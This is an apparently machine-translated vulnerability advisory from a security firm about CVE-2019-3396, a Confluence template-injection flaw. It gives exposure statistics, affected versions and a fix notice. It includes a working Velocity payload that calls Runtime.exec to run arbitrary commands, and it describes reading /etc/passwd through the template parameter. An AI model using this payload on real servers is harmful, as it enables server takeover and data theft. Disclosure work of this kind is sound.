Summary
Recently, the white hat Security Research Institute has detected a confluence Remote Code Execution Vulnerability on the Internet. Confluence is a professional enterprise knowledge management and collaboration software, which is often used to build enterprise wikis. Its powerful editing and site management features can help team members share information, document collaboration, collective discussion and information push. Using this vulnerability, arbitrary files on the server can be read, which in turn can contain malicious files to execute code. May cause sensitive information disclosure, server control and other serious consequences.
Distribution situation
According to the statistics of fofa, there are 78158 confluence open services in the world, the largest in the United States, 23002 services, the second in Germany, 14385 open services, the third in China, 7281 services, the fourth in Australia, 7959 services, the fifth in Ireland, 2893 services.
Global distribution (non vulnerability coverage)
Zhejiang has the most open confluence services in China, with 3040 services, Beijing Second, 1713 services, Shanghai Third, 532 services, Guangdong fourth, 525 services.
National distribution (non vulnerability impact scope)
Vulnerability details
Modify the value of ﹣ template parameter in the request to realize local file inclusion. The following figure obtains the content of / etc / passwd file.
It can also contain remote files and support HTTPS protocol. HTTP cannot be used at present. The figure below is to include remote files to execute remote commands and obtain java version number. SSRF attacks can also be carried out there.
The remote file code to execute the command is (absolute path to be written for the command):
#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{command}",null,null).toString();
Bounce shell:
Influence version
- All 6.6. X before 6.6.12, 6.12. X before 6.12.3, 6.13. X before 6.13.13, and 6.14. X before 6.14.2.
Vulnerability POC
Currently, POC and fofa clients related to the vulnerabilities mentioned in this article have supported the detection of the above vulnerabilities.
CVE number
CVE-2019-3396
Restoration proposal
The vulnerability has been officially fixed. Please download the vulnerability free version on the official website: https://www.atlas.com/
Reference resources
[1] https://mp.weixin.qq.com/s/7PBKDJ7bjRJHtXUau-swNw
[2] http://www.baidu.com/link?url=2wPZHfrdppeOvcjUJKLxRBezai6-QtC-q_gZ4T2UbyefVMjTKQZotRuQ53LCSw_0whpzIYQ5bvXbaRhjnE7RYr498j_T5tsT0L-T4tC1UnO&wd=&eqid=8d1b30c50003f5e9000000025caac2b2
White hat is engaged in information security, focusing on security big data and enterprise Threat Intelligence.
Company products: fofa - Cyberspace Security search engine, foeye - cyberspace retrieval system, nosec - security information platform.
To provide you with: cyberspace mapping, enterprise asset collection, enterprise Threat Intelligence, emergency response services.